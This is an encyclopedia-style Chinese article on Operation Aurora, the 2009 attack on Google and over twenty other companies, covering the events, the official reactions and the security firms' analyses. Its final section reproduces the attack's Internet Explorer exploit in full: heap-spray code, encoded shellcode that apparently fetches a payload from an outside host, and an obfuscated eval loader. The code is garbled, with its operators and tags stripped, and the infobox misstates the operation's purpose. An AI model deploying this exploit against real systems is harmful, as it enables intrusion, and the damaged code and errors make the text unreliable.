極光行動(英語:Operation Aurora)或歐若拉行動是2009年12月中旬可能源自中國的一場網路攻擊,其名稱“Aurora”(意為極光、歐若拉)來自攻擊者電腦上惡意檔案所在路徑的一部分。
基本介紹
- 中文名:極光行動
- 外文名:Operation Aurora
- 發起時間:2009年12月
- 行動目的:防範網路攻擊
內容介紹,歷史事件,具體代碼,
內容介紹
極光行動(英語:Operation Aurora)或歐若拉行動是2009年12月中旬可能源自中國的一場網路攻擊,其名稱“Aurora”(意為極光、歐若拉)來自攻擊者電腦上惡意檔案所在路徑的一部分。遭受攻擊的除了Google外,還有20多家公司:其中包括Adobe Systems、Juniper Networks、Rackspace、雅虎、賽門鐵克、諾斯洛普·格魯門和陶氏化工。這場攻擊過後,Google提出了它的新計畫:它將“在必要的法律範圍內”,於中國運營一個完全不受過濾的搜尋引擎;同時Google也承認,如果該計畫不可實現,它將可能離開中國並關閉它在中國的辦事處
歷史事件
2010年1月12日,Google在它的官方部落格上披露了該公司遭到網路攻擊的時間。該文指出,Gmail服務在12月中旬遭到了來自中國“精心策劃且目標明確”的攻擊,此外還有20多家公司也遭受了類似的攻擊(而部分來源顯示超過34家)。在文中,Google進一步表示,由於中國政府在2009年對網上言論自由的繼續收緊,它將計畫“在必要的法律範圍內”於中國運營一個完全不受過濾的搜尋引擎,並就此事與中國政府商討;假如無法協調一致,Google將可能離開中國並關閉它在中國的辦事處。Google還特意表明了該次決定是由美國的管理團隊作出的,它的中國團隊並不知情,也未曾參與。《連線》雜誌網站引述匿名訊息人士稱,谷歌中國員工此前曾多次遭到訊問,他們因而希望這樣能確保其中國員工的安全。
同日,美國國務卿希拉蕊·柯林頓發表了一則簡短聲明譴責此次攻擊事件,並要求中國作出回應。中國政府當時並未做出正式回應,僅有一位匿名官員表示中國網路管理當局在收集更多關於Google退出中國聲明的信。13日,AHN通訊社報導說,美國國會計畫對Google的指控進行調查,後者指控中國政府利用計算機服務監視人權活動人士。1月14日,中國國務院新聞辦公室主任王晨在接受《人民日報》記者採訪時表示,網路安全主要受到了淫穢色情信息、黑客攻擊、網路欺詐的威脅。法國國際廣播電台(RFI)解讀說,王晨的發言有著為中國網際網路審查制度辯護的明顯用意。同日,中華人民共和國外交部發言人姜瑜也在例行記者會上表示,中國網際網路是開放的,中國政府依法管理網際網路,禁止任何黑客攻擊行為,其針對網際網路的行政法規也符合國際慣例;並稱中國政府將向美方重申該立場。2010年11月28日,維基解密泄露的一些外交電報具體描述了中國最高政治決策機構中央政治局是如何指導攻擊谷歌計算機系統的。1月15日,《新聞周刊》網站刊發了對Google執行長埃里克·施密特的採訪全文。斯密特在採訪中透露說,他們正在與中國政府就谷歌中國的去留問題進行商討。他並不否認有繼續留在中國的可能性,同時也表示公司並不僅被商業利益所左右:他們退出中國市場是“基於價值的抉擇”,否則就應當遵從商業抉擇而“繼續參與中國市場”。1月29日,谷歌CEO施密特在達沃斯論壇上再言反對中國網路審查制度。施密特重申谷歌希望在中國維持運營,但他也表示,如果必須遵守中國網路審查制度,那么谷歌就不希望在中國繼續做下去
對攻擊的分析
在博文中,Google表示有部分智慧財產權遭到盜竊。它認為,黑客的主要興趣在於訪問中國持不同政見者的Gmail帳戶。然而,黑客僅成功查看了兩個賬戶的部分信息,而其中僅包含有郵件主題行以及賬戶創建日期。1月14日,防毒軟體廠商McAfee發表文章分析說,這場攻擊做得十分巧妙。攻擊者利用了Internet Explorer瀏覽器的0day漏洞;微軟已就這一問題發布了公告。Verisign的iDefense實驗室稱,這次攻擊是由“中國或其代理人的特工”實施的。同時,利用漏洞的代碼對代碼中採用的堆噴射技術套用了javascript加密變形,使得檢測困難。攻擊者使用不同的免費2級域名作為跳板遠程控制木馬,攻擊代碼也有多個變種。中國的安全機構安天實驗室發表的報告稱,雖然一系列攻擊的相關性很高,但是目前的證據還不能絕對確認所有的攻擊都來自同一源頭。
McAfee隨後為客戶提供了應對“極光行動”攻擊的網頁,並提醒用戶在點擊或打開可能帶有惡意軟體的電子郵件時需保持警惕:黑客會利用諸如為海地地震募捐等手段騙取用戶打開釣魚郵件
具體代碼
Evals
var n = unescape("%u0c0d%u0c0d");
while (n.length = 524288)n += n;
n = n.substring(0, 524269 - sc.length);
var x = new Array();
for (var i = 0; i 200; i ++ ){
x[i] = n + sc;
}
(repeated 1 time)
Writes
htmlscriptvar sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i sss.length; i ++ ){
arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
);
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i 200; i ++ ){
x1[i] = document.createElement("COMMENT");
x1[i].data = "abc";
}
;
var e1 = null;
function ev1(evt){
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50);
}
function ev2(){
p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
for (i = 0; i x1.length; i ++ ){
x1[i].data = p;
}
;
var t = e1.srcElement;
}
/scriptspan id="sp1"IMG SRC="aaa.gif" onload="ev1(event)"/span/body/html